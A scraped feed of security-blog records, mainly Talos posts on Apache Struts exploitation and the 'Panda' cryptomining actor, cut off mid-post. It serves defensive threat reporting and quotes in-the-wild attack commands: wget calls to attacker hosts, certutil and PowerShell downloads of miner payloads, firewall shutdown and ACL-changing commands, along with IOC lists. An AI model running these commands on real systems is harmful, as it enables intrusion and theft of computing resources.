EXploitation Tool!", "type": "pentestit", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-08-11T06:52:45", "id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-09-07T15:42:00", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-12T15:23:07", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully 